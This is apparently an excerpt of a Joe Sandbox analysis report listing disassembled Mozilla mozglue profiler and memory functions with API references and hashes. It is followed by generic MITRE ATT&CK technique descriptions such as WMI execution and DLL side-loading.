Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ExclusiveLock$CurrentThread$AcquireRelease$?profiler_init@baseprofiler@mozilla@@CloseHandleObjectSingleWait_getpidfreememset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 2885072826-1186885292
Opcode ID: f5efd961b1b3dbce1183398690afb0b2a721b4a53a1bffa8d016187fe50c809b
Instruction ID: 1ec84c9ca2eab134c3731673cda179821a779c97fe836f333001fe6af7dff65e
Opcode Fuzzy Hash: f5efd961b1b3dbce1183398690afb0b2a721b4a53a1bffa8d016187fe50c809b
Instruction Fuzzy Hash: 6EF0A731B022109FDB149F69F845B597FACABC2255F000069EE06D3340D779F446CB75

Uniqueness

Uniqueness Score: -1.00%

Function 6B0C20B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6B0C20B7
AcquireSRWLockExclusive.KERNEL32(00000000,?,6B0AFBD1), ref: 6B0C20C0
ReleaseSRWLockExclusive.KERNEL32(00000000,?,6B0AFBD1), ref: 6B0C20DA
free.MOZGLUE(00000000,?,6B0AFBD1), ref: 6B0C20F1

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 7a3a534b3821c646737b9ed3c2a4390303d4f4250fd8d451ccb7b30c9b11f2d5
Instruction ID: 5ad461ec433cadded1c4a616664f6caf718279452bae4ec2a1651d294330f214
Opcode Fuzzy Hash: 7a3a534b3821c646737b9ed3c2a4390303d4f4250fd8d451ccb7b30c9b11f2d5
Instruction Fuzzy Hash: F4E0EC355006148BC2249F35A80464FBFEDFF862147110517E94783601D779E5418AD6

Uniqueness

Uniqueness Score: -1.00%

Function 6B079A20 Relevance: 5.3, APIs: 4, Instructions: 338COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6B079B2C
memcpy.VCRUNTIME140(6B0799CF,00000000,?), ref: 6B079BB6
memcpy.VCRUNTIME140(?,?,?), ref: 6B079BF8
memcpy.VCRUNTIME140(?,?,?), ref: 6B079DE4

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 268e56affa8926399110cdd80d6b445b20b284e46d5178c1e1e5d80b303de377
Instruction ID: ad825e9a8b751b8472e091ebbb8e93916fe335983d9eecd622fece6ba53840d6
Opcode Fuzzy Hash: 268e56affa8926399110cdd80d6b445b20b284e46d5178c1e1e5d80b303de377
Instruction Fuzzy Hash: E1D16A71A0020A9FCB28CF68C981BAEFBF2FF88314F148529E915A7351D775AD11CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6B0C0A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 6B0837F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6B0D145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6B08380A

Part of subcall function 6B0B8DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6B0D06E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6B0B8DCC

Part of subcall function 6B0C0B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6B0C138F,?,?,?), ref: 6B0C0B80

?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6B0C138F,?,?,?), ref: 6B0C0B27
free.MOZGLUE(?,?,?,?,?,6B0C138F,?,?,?), ref: 6B0C0B3F

Strings

baseprofiler::profiler_capture_backtrace, xrefs: 6B0C0AB5

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
String ID: baseprofiler::profiler_capture_backtrace
API String ID: 3592261714-147032715
Opcode ID: f06ad58709bc73cf8c015f44fdab33fc0d5ac176ac6562d7761d38e303d405b6
Instruction ID: 42f4ce537b6fae9856f35bf6b540e85f42ddc44ffa474867e7601849a49b0278
Opcode Fuzzy Hash: f06ad58709bc73cf8c015f44fdab33fc0d5ac176ac6562d7761d38e303d405b6
Instruction Fuzzy Hash: BD2191B4B042059BDB0CDFA4D891BBF7FBAAF85704F10046CD9159B241EB79A941CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6B07F180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(?,?), ref: 6B07F19B

Part of subcall function 6B09D850: EnterCriticalSection.KERNEL32(?), ref: 6B09D904
Part of subcall function 6B09D850: LeaveCriticalSection.KERNEL32(?), ref: 6B09D971
Part of subcall function 6B09D850: memset.VCRUNTIME140(?,00000000,?), ref: 6B09D97B

mozalloc_abort.MOZGLUE(?), ref: 6B07F209

Strings

d, xrefs: 6B07F1F5

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
String ID: d
API String ID: 3775194440-2564639436
Opcode ID: e8f7d430e66c2a88c7df6cb80181b804c9fec9fa3166799a152de443144095ef
Instruction ID: 55f5db5192b9a9a9f62892b7ff396660627e5bc32e0e135e0c89dcb97f760250
Opcode Fuzzy Hash: e8f7d430e66c2a88c7df6cb80181b804c9fec9fa3166799a152de443144095ef
Instruction Fuzzy Hash: 90115C32E0478997DB089F68D9512FEFFAEDF96218B01523DDC05AB212EB34D985C354

Uniqueness

Uniqueness Score: -1.00%

Function 6B08CA10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?), ref: 6B08CA26

Part of subcall function 6B08CAB0: EnterCriticalSection.KERNEL32(?), ref: 6B08CB49
Part of subcall function 6B08CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6B08CBB6

mozalloc_abort.MOZGLUE(?), ref: 6B08CAA2

Strings

d, xrefs: 6B08CA6C

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalSection$EnterLeavemallocmozalloc_abort
String ID: d
API String ID: 3517139297-2564639436
Opcode ID: 5393a8cbfb7582c7b49fee44ffa18ababcefe3c383f381f8858629233b67b16e
Instruction ID: 9ee73cd738df11a194dbb4376e2d0bc782294b632a2e6318f20c0c46313be44b
Opcode Fuzzy Hash: 5393a8cbfb7582c7b49fee44ffa18ababcefe3c383f381f8858629233b67b16e
Instruction Fuzzy Hash: 63110231E0069893DF04DB68D8002BDBFB5EF96618F04835DDC49AB202EB34E6C5C380

Uniqueness

Uniqueness Score: -1.00%

Function 6B091A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

realloc.MOZGLUE(?,?), ref: 6B091A6B

Part of subcall function 6B091AF0: EnterCriticalSection.KERNEL32(?), ref: 6B091C36

mozalloc_abort.MOZGLUE(?), ref: 6B091AE7

Strings

d, xrefs: 6B091AB1

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalEnterSectionmozalloc_abortrealloc
String ID: d
API String ID: 2670432147-2564639436
Opcode ID: 28a6e473fc9e516cdd0ad2f54336166f90e5360db5830dc65094e63872642691
Instruction ID: e98670359c1847e9924ba8bac51a6eeb49eeed60107fc638836cbc313f190796
Opcode Fuzzy Hash: 28a6e473fc9e516cdd0ad2f54336166f90e5360db5830dc65094e63872642691
Instruction Fuzzy Hash: 63112331E00268A3CB089BA8D8045AEBFB9EF95214F04965DDD495B202EB34E9C1C380

Uniqueness

Uniqueness Score: -1.00%

Function 6B084730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6B0844B2,6B0FE21C,6B0FF7F8), ref: 6B08473E
GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6B08474A

Strings

GetNtLoaderAPI, xrefs: 6B084744

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetNtLoaderAPI
API String ID: 1646373207-1628273567
Opcode ID: aaac3560549a6b9f08082e747fc7c9ff29793e079326c2291c5f475dcb185a80
Instruction ID: a3c7d9c3bc319e3cd0d3ce4ffd78bf1ecb62dc928c9227c27dcf067b354db127
Opcode Fuzzy Hash: aaac3560549a6b9f08082e747fc7c9ff29793e079326c2291c5f475dcb185a80
Instruction Fuzzy Hash: FE010C75705218AFDF089F69D89871D7FEEEB8A351B054069ED05C7340DB78D9028FA1

Uniqueness

Uniqueness Score: -1.00%

Function 6B0D5900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6B0F51C8), ref: 6B0D591A
CloseHandle.KERNEL32(FFFFFFFF), ref: 6B0D592B

Strings

MOZ_SKELETON_UI_RESTARTING, xrefs: 6B0D5915

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CloseEnvironmentHandleVariable
String ID: MOZ_SKELETON_UI_RESTARTING
API String ID: 297244470-335682676
Opcode ID: fc22615bdc9e0c957def7d5cf7325328dcf2bc7f122262347dfc936c35fcb9bf
Instruction ID: d4fe309f9e1542a3c3dc065c8c5fbb818277fb392c02576a148fec9cbb6da567
Opcode Fuzzy Hash: fc22615bdc9e0c957def7d5cf7325328dcf2bc7f122262347dfc936c35fcb9bf
Instruction Fuzzy Hash: 4DE04F34204340BBEB049B68D908746BFEDEB17775F048544EE69936D1CBB9E844C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6B0750E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6B074E9C,?,?,?,?,?), ref: 6B07510A
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6B074E9C,?,?,?,?,?), ref: 6B075167
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6B075196
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6B074E9C), ref: 6B075234

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction ID: 44f82e48e1e7e52ab1e112a3c9a7d973411b34f0ea33987f425c0aff569a4c49
Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction Fuzzy Hash: 28919039604616CFCB28DF18C490A9AFBA2FF89314B198598DD585B325D336FC42CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6B0B08F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6B0FE7DC), ref: 6B0B0918
LeaveCriticalSection.KERNEL32(6B0FE7DC), ref: 6B0B09A6
EnterCriticalSection.KERNEL32(6B0FE7DC,?,00000000), ref: 6B0B09F3
LeaveCriticalSection.KERNEL32(6B0FE7DC), ref: 6B0B0ACB

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 3a029d01361551b3aaa2a119728855a035e14dcf896946b07a654efbc86eba40
Instruction ID: f4e7fb120eedf4a02d0dff414dfd1eb7b78ec3fce92ac69cfbcc402e1b8d3936
Opcode Fuzzy Hash: 3a029d01361551b3aaa2a119728855a035e14dcf896946b07a654efbc86eba40
Instruction Fuzzy Hash: 01514C32715610CFEF1C9B64D9407297FEAEB82F6071585B9DD6597780EB3AEC028780

Uniqueness

Uniqueness Score: -1.00%

Function 6B0D59C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6B0AE56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6B0D5A47
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6B0AE56A,?,|UrlbarCSSSpan), ref: 6B0D5A5C
free.MOZGLUE(?), ref: 6B0D5A97
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6B0D5B9D

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: free$mallocmemset
String ID:
API String ID: 2682772760-0
Opcode ID: d3d88c943795f5eca21937a78b887d9cc1c96528bde1efa50e3d4ef7fa85f90c
Instruction ID: c7f38dff053a5fe441dbda370f2af6b8ec391fde7259146b9b36ad4c0ae997a7
Opcode Fuzzy Hash: d3d88c943795f5eca21937a78b887d9cc1c96528bde1efa50e3d4ef7fa85f90c
Instruction Fuzzy Hash: EE517D746087509FD704CF28C8C071ABBE5FF89318F0489AEE9899B286D778D944CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6B0823D8 Relevance: 5.1, APIs: 4, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 363e16ee16beb0c39604ce07965c2e952edc96bb1d44849f0de8bd41444930e9
Instruction ID: 611cade51114552e993ec4b24264d7c2da21941b135b9234fbb4cd8c732135e8
Opcode Fuzzy Hash: 363e16ee16beb0c39604ce07965c2e952edc96bb1d44849f0de8bd41444930e9
Instruction Fuzzy Hash: 6351AEB1A00206DFDB08CF18C89075ABFB1FF48314F558269D9199B381D779EA95CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6B0D6180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6B0D61DD
memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6B0D622C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6B0D6250
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B0D6292

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 22a88545e6f4ff1c4562f5cb7c6034dc4d65c0eb24ce54c2f1b87aa2231c20e2
Instruction ID: ba3ba6c609ee4a936d96c3b03dc89ca08f45dc14440f9beea2ca91709e67cf44
Opcode Fuzzy Hash: 22a88545e6f4ff1c4562f5cb7c6034dc4d65c0eb24ce54c2f1b87aa2231c20e2
Instruction Fuzzy Hash: 18310871A0070A8FDB18CF28D881B7A7BE9FB55304F104579C95AD72A1EB35E558CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6B08BBE0 Relevance: 5.1, APIs: 4, Instructions: 96COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6B08BBF4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6B08BC66
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6B08BC96
memcpy.VCRUNTIME140(00000000,00000010,0000001F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B08BCCE

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 386c90c7ac5c70553b0429d9a14f846b24ccaa4571c1d74b898fd52df38d00f0
Instruction ID: 49fdf4c9d028a83d41554ba905ea55eb28a33af55c0af06e8e8a418ed472ce21
Opcode Fuzzy Hash: 386c90c7ac5c70553b0429d9a14f846b24ccaa4571c1d74b898fd52df38d00f0
Instruction Fuzzy Hash: F1215771F002044BFB188F3DDC8272E7EEAEB85394F544938D856D6351EE76E6448361

Uniqueness

Uniqueness Score: -1.00%

Function 6B08B940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6B08B96F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6B08B99A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6B08B9B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B08B9B9

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: 53d6b958a3dde18d2e4ddbbdb5a23f234a3944a42ce44e5d1bd51112426c63b3
Instruction ID: e677dd9711be0100c3c7c43a31edb586dec8b428667146be01fb4393a68d2940
Opcode Fuzzy Hash: 53d6b958a3dde18d2e4ddbbdb5a23f234a3944a42ce44e5d1bd51112426c63b3
Instruction Fuzzy Hash: D31142B1A002059FCB18CF69D88199BBBF9BF98214B14453AE959D3301E735EA158AA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
